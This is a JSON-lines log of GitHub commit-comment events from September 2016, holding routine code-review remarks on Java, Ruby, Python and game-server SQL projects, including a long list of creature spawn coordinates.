{"id":"4520023618","type":"CommitCommentEvent","actor":{"login":"snowch"},"repo":{"name":"LispyAriaro/hsm-guide"},"payload":{"comment":{"id":18907659,"position":null,"line":null,"path":null,"commit_id":"9da87de9053aee6519cf0fecfd53c4541941bb79","created_at":"2016-09-06T08:52:15Z","updated_at":"2016-09-06T08:52:15Z","body":"Hi @LispyAriaro - it would be good to get these links added.  Would you be able to send a PR?"}},"created_at":"2016-09-06T08:52:15Z"}
{"id":"4520025534","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"Armanhhrayri/Shop"},"payload":{"comment":{"id":18907668,"position":7,"line":7,"path":"src/am/aca/shop/repository/UserRepositoryInterface.java","commit_id":"c504e48901babce1ffc95d95a17bff188ee4c14e","created_at":"2016-09-06T08:52:38Z","updated_at":"2016-09-06T08:52:38Z","body":"public User addUser(User user) throws InvalidArgException;\r\npublic User editUser(User user) throws InvalidArgException;"}},"created_at":"2016-09-06T08:52:38Z"}
{"id":"4520027792","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"Armanhhrayri/Shop"},"payload":{"comment":{"id":18907670,"position":null,"line":null,"path":null,"commit_id":"c504e48901babce1ffc95d95a17bff188ee4c14e","created_at":"2016-09-06T08:53:08Z","updated_at":"2016-09-06T08:53:08Z","body":"All your beans User, Order, LineItem etc. should has id field."}},"created_at":"2016-09-06T08:53:08Z"}
{"id":"4520028464","type":"CommitCommentEvent","actor":{"login":"dira"},"repo":{"name":"Murzic/feed_manager"},"payload":{"comment":{"id":18907673,"position":13,"line":12,"path":"app/services/import_feed_service.rb","commit_id":"8b27cf1f47a5ab54927f8f3757fd5dc6d65b5237","created_at":"2016-09-06T08:53:16Z","updated_at":"2016-09-06T08:53:16Z","body":"👍 \r\n"}},"created_at":"2016-09-06T08:53:16Z"}
{"id":"4520029585","type":"CommitCommentEvent","actor":{"login":"UglyWillDuckling"},"repo":{"name":"amenk/magento2"},"payload":{"comment":{"id":18907677,"position":null,"line":null,"path":null,"commit_id":"80a2fa4cdce7d968a995f8f64cae9de73891713a","created_at":"2016-09-06T08:53:31Z","updated_at":"2016-09-06T08:53:31Z","body":"I implemented this, but it still requires the customer to give his or hers own address. Any way to fix that?"}},"created_at":"2016-09-06T08:53:31Z"}
{"id":"4520032939","type":"CommitCommentEvent","actor":{"login":"zuonima"},"repo":{"name":"zuonima/tmts"},"payload":{"comment":{"id":18907684,"position":null,"line":null,"path":null,"commit_id":"9c618d194732addaee2f28c559d8c2c283a0db78","created_at":"2016-09-06T08:54:12Z","updated_at":"2016-09-06T08:54:12Z","body":"说明文件"}},"created_at":"2016-09-06T08:54:12Z"}
{"id":"4520034633","type":"CommitCommentEvent","actor":{"login":"drkutuzov"},"repo":{"name":"s123594/modellingProject"},"payload":{"comment":{"id":18907686,"position":null,"line":null,"path":null,"commit_id":"61b85f1b114579c5fda1c85e84ad9de18dbc13ba","created_at":"2016-09-06T08:54:33Z","updated_at":"2016-09-06T08:54:33Z","body":"Put it into a function (functions) and then we can test it on the real data"}},"created_at":"2016-09-06T08:54:33Z"}
{"id":"4520039040","type":"CommitCommentEvent","actor":{"login":"cadaver"},"repo":{"name":"urho3d/Urho3D"},"payload":{"comment":{"id":18907696,"position":null,"line":null,"path":null,"commit_id":"48f779e234b4cf6f2429e1456935412731950ef8","created_at":"2016-09-06T08:55:27Z","updated_at":"2016-09-06T08:55:27Z","body":"Hmm yes, that's a good idea. I can add a plane with that material to the SceneLoad example scene."}},"created_at":"2016-09-06T08:55:27Z"}
{"id":"4520042783","type":"CommitCommentEvent","actor":{"login":"paveldedik"},"repo":{"name":"mergado/sklik-api-client-python"},"payload":{"comment":{"id":18907709,"position":null,"line":null,"path":null,"commit_id":"bc4cda71f0c006fa9d2d08a6ff25a2673e9a6bf2","created_at":"2016-09-06T08:56:11Z","updated_at":"2016-09-06T08:56:11Z","body":"Možná by ten generátor ani nebyl potřeba, jakože toto mi přijde trošku přehlednější:\r\n\r\n```python\r\nfor offset in xrange(0, len(keywords), 100):\r\n    chunk = keywords[offset:offset+100]\r\n    result.update(self._call('keywords.create', chunk))\r\n```\r\n\r\na nebo velmi škaredý one-liner :-D\r\n\r\n```python\r\nreturn {k: v for k, v in self._call('keywords.create', keywords[x:x+100]).items() for x in xrange(0, len(keywords), 100)}\r\n```"}},"created_at":"2016-09-06T08:56:11Z"}
{"id":"4520044268","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"LilitHayrapetyan/test"},"payload":{"comment":{"id":18907711,"position":4,"line":4,"path":"src/am/aca/onlineshop/common/model/CardType.java","commit_id":"2e8e490e4cfcaa71e588379486ee9d20a8311e67","created_at":"2016-09-06T08:56:27Z","updated_at":"2016-09-06T08:56:27Z","body":"public enum CardType{\r\nMASTER(1),\r\nVISA(2);\r\nprivate int cardTypeId;\r\nCardType(int cardTypeId){\r\nthis.cardTypeId = cardTypeId;\r\n}\r\n\r\n}"}},"created_at":"2016-09-06T08:56:27Z"}
{"id":"4520044685","type":"CommitCommentEvent","actor":{"login":"dira"},"repo":{"name":"Murzic/feed_manager"},"payload":{"comment":{"id":18907714,"position":5,"line":8,"path":"app/views/feeds/_feed.html.erb","commit_id":"98936f3692e734cb3ae664350b1c7ba9bbba2bfc","created_at":"2016-09-06T08:56:32Z","updated_at":"2016-09-06T08:56:32Z","body":"This is a strange change in the commit titled \"Add category field to products\" :)"}},"created_at":"2016-09-06T08:56:32Z"}
{"id":"4520045656","type":"CommitCommentEvent","actor":{"login":"SCdF"},"repo":{"name":"medic/medic-webapp"},"payload":{"comment":{"id":18907715,"position":5,"line":86,"path":"static/js/app.js","commit_id":"dc4c11d615c95934867f06b21f3f99f7c1a6ac02","created_at":"2016-09-06T08:56:43Z","updated_at":"2016-09-06T08:56:43Z","body":"So I came to the conclusion when I tried (and clearly failed) to help with this ticket that auto compaction was working correctly. Was I wrong?"}},"created_at":"2016-09-06T08:56:43Z"}
{"id":"4520045903","type":"CommitCommentEvent","actor":{"login":"aaime"},"repo":{"name":"mantesat/geotools"},"payload":{"comment":{"id":18907717,"position":8,"line":188,"path":"modules/library/coverage/src/main/java/org/geotools/coverage/grid/io/AbstractGridFormat.java","commit_id":"e81a0daebcd34a05a0ff802208f432a3651f8c65","created_at":"2016-09-06T08:56:47Z","updated_at":"2016-09-06T08:56:47Z","body":"\"in order to specify the output bands\" (the current sentence is a bit convoluted, simplify it, the next one already provides the details in a more readable way)"}},"created_at":"2016-09-06T08:56:47Z"}
{"id":"4520045956","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"LilitHayrapetyan/test"},"payload":{"comment":{"id":18907718,"position":4,"line":4,"path":"src/am/aca/onlineshop/common/model/ShippingAddress.java","commit_id":"2e8e490e4cfcaa71e588379486ee9d20a8311e67","created_at":"2016-09-06T08:56:47Z","updated_at":"2016-09-06T08:56:47Z","body":"private id;"}},"created_at":"2016-09-06T08:56:47Z"}
{"id":"4520046265","type":"CommitCommentEvent","actor":{"login":"dira"},"repo":{"name":"Murzic/feed_manager"},"payload":{"comment":{"id":18907719,"position":5,"line":5,"path":"app/views/products/_product.html.erb","commit_id":"98936f3692e734cb3ae664350b1c7ba9bbba2bfc","created_at":"2016-09-06T08:56:51Z","updated_at":"2016-09-06T08:56:51Z","body":"Why remove the campaign name?"}},"created_at":"2016-09-06T08:56:51Z"}
{"id":"4520049503","type":"CommitCommentEvent","actor":{"login":"familycomputer59"},"repo":{"name":"familycomputer59/verifying-person-prj-ble-peripheral"},"payload":{"comment":{"id":18907725,"position":null,"line":null,"path":null,"commit_id":"80494f95d8e1088500a516a32a44be33df2a391e","created_at":"2016-09-06T08:57:30Z","updated_at":"2016-09-06T08:57:30Z","body":"UPDATE"}},"created_at":"2016-09-06T08:57:30Z"}
{"id":"4520051360","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/OpenCloudConfig"},"payload":{"comment":{"id":18907728,"position":null,"line":null,"path":null,"commit_id":"4e64e682db1c67b802c67d3c3f4325b86374b6b6","created_at":"2016-09-06T08:57:52Z","updated_at":"2016-09-06T08:57:52Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#PTge_1nWTwuLOPyisu4YYA"}},"created_at":"2016-09-06T08:57:52Z"}
{"id":"4520053263","type":"CommitCommentEvent","actor":{"login":"aaime"},"repo":{"name":"mantesat/geotools"},"payload":{"comment":{"id":18907731,"position":18,"line":128,"path":"modules/library/coverage/src/main/java/org/geotools/coverage/grid/io/GridCoverage2DReader.java","commit_id":"e81a0daebcd34a05a0ff802208f432a3651f8c65","created_at":"2016-09-06T08:58:16Z","updated_at":"2016-09-06T08:58:16Z","body":"The parameter should be advertised in the Format as part of the read parameters, the trick of the ReprojectReader was used because there is no way to tell otherwise if the grid geometry will be respected fully, or just partially. Bands is something that one either supports or not, there are no mid-grounds"}},"created_at":"2016-09-06T08:58:16Z"}
{"id":"4520054058","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"LilitHayrapetyan/test"},"payload":{"comment":{"id":18907732,"position":26,"line":26,"path":"src/am/aca/onlineshop/controller/Controller.java","commit_id":"2e8e490e4cfcaa71e588379486ee9d20a8311e67","created_at":"2016-09-06T08:58:25Z","updated_at":"2016-09-06T08:58:25Z","body":"You shouldn't keep product here"}},"created_at":"2016-09-06T08:58:25Z"}
{"id":"4520055765","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"LilitHayrapetyan/test"},"payload":{"comment":{"id":18907735,"position":25,"line":25,"path":"src/am/aca/onlineshop/controller/Controller.java","commit_id":"2e8e490e4cfcaa71e588379486ee9d20a8311e67","created_at":"2016-09-06T08:58:46Z","updated_at":"2016-09-06T08:58:46Z","body":"User user -> User logedInUser;"}},"created_at":"2016-09-06T08:58:46Z"}
{"id":"4520056500","type":"CommitCommentEvent","actor":{"login":"boxa"},"repo":{"name":"cmangos/mangos-wotlk"},"payload":{"comment":{"id":18907740,"position":null,"line":null,"path":null,"commit_id":"8835ddf39694260c2234c0ca4b3c54e705aa44ff","created_at":"2016-09-06T08:58:55Z","updated_at":"2016-09-06T08:58:55Z","body":"i'm use YTDB (base) +  UDB + TDB + my db =)\r\n\r\nin YTDB we have 55 wolfs in world:\r\n\r\nDELETE FROM `creature` WHERE `id`=18706;\r\nINSERT INTO `creature` (`guid`,`id`,`map`,`spawnMask`,`phaseMask`,`modelid`,`equipment_id`,`position_x`,`position_y`,`position_z`,`orientation`,`spawntimesecs`,`spawndist`,`currentwaypoint`,`curhealth`,`curmana`,`DeathState`,`MovementType`) VALUES\r\n(56831, 18706, 530, 1, 1, 0, 0, -503.72, 3018.28, 5.37963, 5.28315, 600, 0, 0, 3989, 0, 0, 0),\r\n(56832, 18706, 530, 1, 1, 0, 0, -551.215, 3053.09, 3.86064, 4.41136, 600, 0, 0, 3989, 0, 0, 0),\r\n(56833, 18706, 530, 1, 1, 0, 0, -608.792, 2995.48, 18.7262, 3.70058, 600, 0, 0, 3989, 0, 0, 0),\r\n(56834, 18706, 530, 1, 1, 0, 0, -547.977, 2975.84, 18.3995, 6.01672, 600, 0, 0, 3989, 0, 0, 0),\r\n(56835, 18706, 530, 1, 1, 0, 0, -508.866, 2954.1, 20.54, 5.02319, 600, 0, 0, 3989, 0, 0, 0),\r\n(56836, 18706, 530, 1, 1, 0, 0, -449.346, 2939.35, 17.3983, 0.178068, 600, 0, 0, 3989, 0, 0, 0),\r\n(56837, 18706, 530, 1, 1, 0, 0, -458.871, 2873.67, 30.5836, 3.9307, 600, 0, 0, 3989, 0, 0, 0),\r\n(56838, 18706, 530, 1, 1, 0, 0, -475.195, 2821.79, 41.7637, 4.81977, 600, 0, 0, 3989, 0, 0, 0),\r\n(56839, 18706, 530, 1, 1, 0, 0, -462.945, 2753.72, 50.2872, 4.89045, 600, 0, 0, 3989, 0, 0, 0),\r\n(56840, 18706, 530, 1, 1, 0, 0, -431.312, 2734.61, 44.9521, 4.03044, 600, 0, 0, 3989, 0, 0, 0),\r\n(56841, 18706, 530, 1, 1, 0, 0, -453.951, 2700.44, 55.927, 4.35795, 600, 0, 0, 3989, 0, 0, 0),\r\n(56842, 18706, 530, 1, 1, 0, 0, -406.788, 2671.61, 47.9739, 6.11803, 600, 0, 0, 3989, 0, 0, 0),\r\n(56843, 18706, 530, 1, 1, 0, 0, -356.072, 2662.95, 41.8704, 0.37127, 600, 0, 0, 3989, 0, 0, 0),\r\n(56844, 18706, 530, 1, 1, 0, 0, -449.949, 2659.41, 58.9555, 1.86745, 600, 0, 0, 3989, 0, 0, 0),\r\n(56845, 18706, 530, 1, 1, 0, 0, -366.961, 2611.05, 48.6554, 3.11859, 600, 0, 0, 3989, 0, 0, 0),\r\n(56846, 18706, 530, 1, 1, 0, 0, -419.003, 2600.09, 53.9768, 3.89142, 600, 0, 0, 3989, 0, 0, 0),\r\n(56847, 18706, 530, 1, 1, 0, 0, -402.45, 2551.08, 49.5406, 5.0381, 600, 0, 0, 3989, 0, 0, 0),\r\n(56848, 18706, 530, 1, 1, 0, 0, -385.853, 2498.12, 42.8967, 0.55348, 600, 0, 0, 3989, 0, 0, 0),\r\n(56849, 18706, 530, 1, 1, 0, 0, -457.978, 2532.72, 51.5992, 1.73943, 600, 0, 0, 3989, 0, 0, 0),\r\n(56850, 18706, 530, 1, 1, 0, 0, -412.945, 2498.75, 43.8956, 1.23285, 600, 0, 0, 3989, 0, 0, 0),\r\n(56851, 18706, 530, 1, 1, 0, 0, -479.689, 2470.84, 42.8986, 0.887272, 600, 0, 0, 3989, 0, 0, 0),\r\n(56852, 18706, 530, 1, 1, 0, 0, -512.264, 2530.41, 57.4188, 1.75435, 600, 0, 0, 3989, 0, 0, 0),\r\n(56853, 18706, 530, 1, 1, 0, 0, -507.284, 2695.75, 67.414, 2.52954, 600, 0, 0, 3989, 0, 0, 0),\r\n(56854, 18706, 530, 1, 1, 0, 0, -510.109, 2759.56, 61.1442, 2.88219, 600, 0, 0, 3989, 0, 0, 0),\r\n(56855, 18706, 530, 1, 1, 0, 0, -549.255, 2793.31, 63.3366, 2.12978, 600, 0, 0, 3989, 0, 0, 0),\r\n(56856, 18706, 530, 1, 1, 0, 0, -535.002, 2831.49, 53.3566, 1.30904, 600, 0, 0, 3989, 0, 0, 0),\r\n(56857, 18706, 530, 1, 1, 0, 0, -524.387, 2890.25, 39.5388, 0.760042, 600, 0, 0, 3989, 0, 0, 0),\r\n(56858, 18706, 530, 1, 1, 0, 0, -482.301, 2898.57, 31.5058, 0.00291825, 600, 0, 0, 3989, 0, 0, 0),\r\n(56859, 18706, 530, 1, 1, 0, 0, -413.097, 2906.05, 17.8705, 0.00291825, 600, 0, 0, 3989, 0, 0, 0),\r\n(56860, 18706, 530, 1, 1, 0, 0, -396.718, 2804.29, 20.285, 0.714492, 600, 0, 0, 3989, 0, 0, 0),\r\n(56861, 18706, 530, 1, 1, 0, 0, -378.944, 2832.09, 6.85353, 0.722346, 600, 0, 0, 3989, 0, 0, 0),\r\n(56862, 18706, 530, 1, 1, 0, 0, -434.847, 2413.36, 37.431, 0.908483, 600, 0, 0, 3989, 0, 0, 0),\r\n(56863, 18706, 530, 1, 1, 0, 0, -336.518, 2452.4, 41.061, 0.896701, 600, 0, 0, 3989, 0, 0, 0),\r\n(56864, 18706, 530, 1, 1, 0, 0, -285.569, 2475.54, 40.5024, 3.8875, 600, 0, 0, 3989, 0, 0, 0),\r\n(56865, 18706, 530, 1, 1, 0, 0, -153.629, 2445.01, 37.1462, 6.12195, 600, 0, 0, 3989, 0, 0, 0),\r\n(56866, 18706, 530, 1, 1, 0, 0, -102.368, 2468.97, 46.3839, 0.681498, 600, 0, 0, 3989, 0, 0, 0),\r\n(56867, 18706, 530, 1, 1, 0, 0, -117.005, 2389, 51.5605, 5.30121, 600, 0, 0, 3989, 0, 0, 0),\r\n(56868, 18706, 530, 1, 1, 0, 0, -160.921, 2378.48, 54.3205, 3.04712, 600, 0, 0, 3989, 0, 0, 0),\r\n(56869, 18706, 530, 1, 1, 0, 0, -59.8148, 2519.36, 52.466, 5.86748, 600, 0, 0, 3989, 0, 0, 0),\r\n(56870, 18706, 530, 1, 1, 0, 0, -106.134, 2517.58, 48.5308, 2.80914, 600, 0, 0, 3989, 0, 0, 0),\r\n(56871, 18706, 530, 1, 1, 0, 0, -124.706, 2567.66, 45.3316, 2.27193, 600, 0, 0, 3989, 0, 0, 0),\r\n(56872, 18706, 530, 1, 1, 0, 0, -59.7391, 2574.52, 56.7392, 5.11664, 600, 0, 0, 3989, 0, 0, 0),\r\n(56873, 18706, 530, 1, 1, 0, 0, -129.966, 2653.76, 48.5002, 2.61829, 600, 0, 0, 3989, 0, 0, 0),\r\n(56874, 18706, 530, 1, 1, 0, 0, -122.831, 2697.07, 45.4746, 1.96248, 600, 0, 0, 3989, 0, 0, 0),\r\n(56875, 18706, 530, 1, 1, 0, 0, -117.982, 2772.02, 46.9111, 2.58766, 600, 0, 0, 3989, 0, 0, 0),\r\n(56876, 18706, 530, 1, 1, 0, 0, -67.8919, 2816.85, 49.1922, 0.636728, 600, 0, 0, 3989, 0, 0, 0),\r\n(56877, 18706, 530, 1, 1, 0, 0, -17.9395, 2762.18, 67.2952, 5.07187, 600, 0, 0, 3989, 0, 0, 0),\r\n(56878, 18706, 530, 1, 1, 0, 0, -44.7029, 2712.3, 62.8902, 0.717625, 600, 0, 0, 3989, 0, 0, 0),\r\n(56879, 18706, 530, 1, 1, 0, 0, -85.2157, 2666.1, 55.0743, 3.41704, 600, 0, 0, 3989, 0, 0, 0),\r\n(56880, 18706, 530, 1, 1, 0, 0, -109.695, 2631.86, 50.5732, 4.10898, 600, 0, 0, 3989, 0, 0, 0),\r\n(56881, 18706, 530, 1, 1, 0, 0, -82.6717, 2602.12, 54.3954, 5.45279, 600, 0, 0, 3989, 0, 0, 0),\r\n(56882, 18706, 530, 1, 1, 0, 0, -39.5221, 2629.31, 63.7007, 1.11818, 600, 0, 0, 3989, 0, 0, 0),\r\n(56883, 18706, 530, 1, 1, 0, 0, -29.9096, 2535.7, 56.5745, 5.31064, 600, 0, 0, 3989, 0, 0, 0),\r\n(56884, 18706, 530, 1, 1, 0, 0, -82.286, 2541.54, 51.7707, 2.14313, 600, 0, 0, 3989, 0, 0, 0),\r\n(56885, 18706, 530, 1, 1, 0, 0, -77.0835, 2697.68, 56.7674, 4.26763, 600, 0, 0, 3989, 0, 0, 0);"}},"created_at":"2016-09-06T08:58:55Z"}
{"id":"4520057380","type":"CommitCommentEvent","actor":{"login":"familycomputer59"},"repo":{"name":"familycomputer59/verifying-person-prj-ble-central"},"payload":{"comment":{"id":18907743,"position":null,"line":null,"path":null,"commit_id":"4efd45eeeb77c52348702565450120467ee8419a","created_at":"2016-09-06T08:59:08Z","updated_at":"2016-09-06T08:59:08Z","body":"UPDATE"}},"created_at":"2016-09-06T08:59:08Z"}
{"id":"4520057598","type":"CommitCommentEvent","actor":{"login":"fukano-ren"},"repo":{"name":"fukano-ren/ToDoList"},"payload":{"comment":{"id":18907744,"position":null,"line":null,"path":null,"commit_id":"e741b659dae711e0d86dcd0d4a0acbb4a7780185","created_at":"2016-09-06T08:59:11Z","updated_at":"2016-09-06T08:59:11Z","body":"C:\\Users\\user02\\Documents\\rails\\ToDoList\r\nheroku push 完了です"}},"created_at":"2016-09-06T08:59:11Z"}
{"id":"4520058043","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"LilitHayrapetyan/test"},"payload":{"comment":{"id":18907746,"position":2,"line":2,"path":"src/am/aca/onlineshop/controller/main.java","commit_id":"2e8e490e4cfcaa71e588379486ee9d20a8311e67","created_at":"2016-09-06T08:59:16Z","updated_at":"2016-09-06T08:59:16Z","body":"main -> Main"}},"created_at":"2016-09-06T08:59:16Z"}
{"id":"4520058918","type":"CommitCommentEvent","actor":{"login":"sanichan"},"repo":{"name":"sanichan/sanichan.github.io"},"payload":{"comment":{"id":18907756,"position":null,"line":null,"path":null,"commit_id":"dc0909f3429d7193a0466a14d5405124aa03890c","created_at":"2016-09-06T08:59:28Z","updated_at":"2016-09-06T08:59:28Z","body":"delete file"}},"created_at":"2016-09-06T08:59:28Z"}
{"id":"4520064124","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"LilitHayrapetyan/test"},"payload":{"comment":{"id":18907771,"position":10,"line":10,"path":"src/am/aca/onlineshop/repository/implementations/UserRepository.java","commit_id":"2e8e490e4cfcaa71e588379486ee9d20a8311e67","created_at":"2016-09-06T09:00:31Z","updated_at":"2016-09-06T09:00:31Z","body":"public void deleteUser(int userId) throws InvalidArgumentException{}"}},"created_at":"2016-09-06T09:00:31Z"}
{"id":"4520064723","type":"CommitCommentEvent","actor":{"login":"aaime"},"repo":{"name":"mantesat/geoserver"},"payload":{"comment":{"id":18907772,"position":123,"line":331,"path":"src/main/src/main/java/org/geoserver/catalog/CoverageViewReader.java","commit_id":"a96efee80476eb09a6f9531e9b7df460d811f254","created_at":"2016-09-06T09:00:36Z","updated_at":"2016-09-06T09:00:36Z","body":"Formatting issues. Are you using tabs?"}},"created_at":"2016-09-06T09:00:36Z"}
{"id":"4520066227","type":"CommitCommentEvent","actor":{"login":"andryyy"},"repo":{"name":"inverse-inc/sogo"},"payload":{"comment":{"id":18907775,"position":null,"line":null,"path":null,"commit_id":"8b9ceb327335a7995374472939c78665d035b148","created_at":"2016-09-06T09:00:53Z","updated_at":"2016-09-06T09:00:53Z","body":"Nice! Just came here to check how it can be implemented. :-)"}},"created_at":"2016-09-06T09:00:53Z"}
{"id":"4520066723","type":"CommitCommentEvent","actor":{"login":"koying"},"repo":{"name":"MrMC/mrmc"},"payload":{"comment":{"id":18907779,"position":null,"line":null,"path":null,"commit_id":"71aab9098eeb85767bf76a6294c9b3780bdb73ea","created_at":"2016-09-06T09:01:00Z","updated_at":"2016-09-06T09:01:00Z","body":"@mrmc Would you mind explaining this to me?\r\nAFAIK, droid still doesn't support versionned libraries.\r\n\r\nOr is t just because it is in practice not needed because we dyload?"}},"created_at":"2016-09-06T09:01:00Z"}
{"id":"4520067199","type":"CommitCommentEvent","actor":{"login":"killerwife"},"repo":{"name":"cmangos/mangos-wotlk"},"payload":{"comment":{"id":18907782,"position":20,"line":1105,"path":"src/game/AI/CreatureEventAI.cpp","commit_id":"4e887248518c59ef5f418a6cc6fc9e880aee12b6","created_at":"2016-09-06T09:01:07Z","updated_at":"2016-09-06T09:01:07Z","body":"I will examine all of it when I get home. There was a lot of shenanigans going on before."}},"created_at":"2016-09-06T09:01:07Z"}
{"id":"4520067464","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"LilitHayrapetyan/test"},"payload":{"comment":{"id":18907784,"position":35,"line":35,"path":"src/am/aca/onlineshop/repository/implementations/UserRepository.java","commit_id":"2e8e490e4cfcaa71e588379486ee9d20a8311e67","created_at":"2016-09-06T09:01:10Z","updated_at":"2016-09-06T09:01:10Z","body":"public User editUser(User user) throws InvalidArgumentException"}},"created_at":"2016-09-06T09:01:10Z"}
{"id":"4520070036","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"LilitHayrapetyan/test"},"payload":{"comment":{"id":18907788,"position":29,"line":29,"path":"src/am/aca/onlineshop/repository/implementations/UserRepository.java","commit_id":"2e8e490e4cfcaa71e588379486ee9d20a8311e67","created_at":"2016-09-06T09:01:38Z","updated_at":"2016-09-06T09:01:38Z","body":"You don't need this method here\r\npublic boolean userListContainUserOrNot(List<User> userList, User usr) "}},"created_at":"2016-09-06T09:01:38Z"}
{"id":"4520070447","type":"CommitCommentEvent","actor":{"login":"dira"},"repo":{"name":"Murzic/feed_manager"},"payload":{"comment":{"id":18907792,"position":6,"line":6,"path":"test/services/feed_import/service_test.rb","commit_id":"aadebb41f5a05425a7e4983431ac293ce1a4006d","created_at":"2016-09-06T09:01:43Z","updated_at":"2016-09-06T09:01:43Z","body":"I think that deriving the path of the \"files\" folder starting from the location of the current spec is quite fragile. What do you think? Can you see another, more stable, way?"}},"created_at":"2016-09-06T09:01:43Z"}
{"id":"4520071947","type":"CommitCommentEvent","actor":{"login":"davetoxa"},"repo":{"name":"akilbekov/flashcards"},"payload":{"comment":{"id":18907795,"position":6,"line":10,"path":"app/controllers/home_controller.rb","commit_id":"981465d89eb3193515c73a313e97245e3868f420","created_at":"2016-09-06T09:02:02Z","updated_at":"2016-09-06T09:02:02Z","body":"Зачем передавать id если он там итак уже есть? "}},"created_at":"2016-09-06T09:02:02Z"}
{"id":"4520072995","type":"CommitCommentEvent","actor":{"login":"SCdF"},"repo":{"name":"medic/medic-webapp"},"payload":{"comment":{"id":18907799,"position":6,"line":56,"path":"static/js/services/db.js","commit_id":"dc4c11d615c95934867f06b21f3f99f7c1a6ac02","created_at":"2016-09-06T09:02:18Z","updated_at":"2016-09-06T09:02:18Z","body":"Right, so this happens on every boot, the idea being that they have just refreshed the app because of a new ddoc? Do we know when view generation happens in PouchDB? I wonder if it would be worthwhile trying to work out if we can determine all its view indexes have generated before attempting a cleanup/"}},"created_at":"2016-09-06T09:02:18Z"}
{"id":"4520073246","type":"CommitCommentEvent","actor":{"login":"ajsnake"},"repo":{"name":"maierfelix/POGOserver"},"payload":{"comment":{"id":18907801,"position":null,"line":null,"path":null,"commit_id":"2de38e5568de9f29c1e2f175ba92971308c20f78","created_at":"2016-09-06T09:02:20Z","updated_at":"2016-09-06T09:02:20Z","body":"I can't pass the terms and conditions message in-game, I get this:\r\n![cmd_terms](https://cloud.githubusercontent.com/assets/22024150/18267854/0aa295f4-73ef-11e6-8802-8bb60464b2d4.png)\r\n"}},"created_at":"2016-09-06T09:02:20Z"}
{"id":"4520073658","type":"CommitCommentEvent","actor":{"login":"dira"},"repo":{"name":"Murzic/feed_manager"},"payload":{"comment":{"id":18907803,"position":33,"line":33,"path":"test/services/feed_import/service_test.rb","commit_id":"aadebb41f5a05425a7e4983431ac293ce1a4006d","created_at":"2016-09-06T09:02:25Z","updated_at":"2016-09-06T09:02:25Z","body":"👍 \r\n"}},"created_at":"2016-09-06T09:02:25Z"}
{"id":"4520076903","type":"CommitCommentEvent","actor":{"login":"taomWTP"},"repo":{"name":"taomWTP/gradle-nunit-plugin"},"payload":{"comment":{"id":18907807,"position":null,"line":null,"path":null,"commit_id":"13ff5b891c1d582a63f1f2da56b0c8294eb49d86","created_at":"2016-09-06T09:03:05Z","updated_at":"2016-09-06T09:03:05Z","body":"fixed this error https://github.com/michel-kraemer/gradle-download-task/issues/47"}},"created_at":"2016-09-06T09:03:05Z"}
{"id":"4520079084","type":"CommitCommentEvent","actor":{"login":"hroncok"},"repo":{"name":"frenzymadness/content"},"payload":{"comment":{"id":18907812,"position":9,"line":9,"path":"tech/languages/python/micropython.md","commit_id":"6dbd8448556eff0626c1ba39590cb76e141c73e9","created_at":"2016-09-06T09:03:31Z","updated_at":"2016-09-06T09:03:31Z","body":"Double MicroPython?\r\n\r\n> [MicroPython](https://micropython.org/) MicroPython is a special"}},"created_at":"2016-09-06T09:03:31Z"}
{"id":"4520079824","type":"CommitCommentEvent","actor":{"login":"najidagher"},"repo":{"name":"dinosaadeh/Barjis"},"payload":{"comment":{"id":18907813,"position":71,"line":116,"path":"core/src/com/smb215team/barjis/game/objects/Pawn.java","commit_id":"08716faae207e923350e6234b8c5a8f45520aea2","created_at":"2016-09-06T09:03:40Z","updated_at":"2016-09-06T09:03:40Z","body":"If u talking about the 0.12f/2 and 0.14f /2 ...it is for the originx and originy (width/2) (height/2)"}},"created_at":"2016-09-06T09:03:40Z"}
{"id":"4520080026","type":"CommitCommentEvent","actor":{"login":"sirupe"},"repo":{"name":"sirupe/jspStudy"},"payload":{"comment":{"id":18907815,"position":4,"line":8,"path":"src/test/wow.java","commit_id":"a5ebf3b2f7b57d7f442e96b65bdbb909ec85cbba","created_at":"2016-09-06T09:03:42Z","updated_at":"2016-09-06T09:03:42Z","body":"잘했어요!!"}},"created_at":"2016-09-06T09:03:42Z"}
{"id":"4520081812","type":"CommitCommentEvent","actor":{"login":"dira"},"repo":{"name":"Murzic/feed_manager"},"payload":{"comment":{"id":18907818,"position":42,"line":42,"path":"test/services/feed_import/service_test.rb","commit_id":"aadebb41f5a05425a7e4983431ac293ce1a4006d","created_at":"2016-09-06T09:04:05Z","updated_at":"2016-09-06T09:04:05Z","body":"Why is this in the `FeedImport::ServiceTest` class?"}},"created_at":"2016-09-06T09:04:05Z"}
{"id":"4520085196","type":"CommitCommentEvent","actor":{"login":"mamedov"},"repo":{"name":"mamedov/heroic-sns"},"payload":{"comment":{"id":18907824,"position":5,"line":118,"path":"lib/heroic/sns/endpoint.rb","commit_id":"66c978612aaff842800ade633bf6c6eddc6f66d3","created_at":"2016-09-06T09:04:46Z","updated_at":"2016-09-06T09:04:46Z","body":"ah, okay\r\nI will check it again. May be case for ENV variable on our side makes sense"}},"created_at":"2016-09-06T09:04:46Z"}
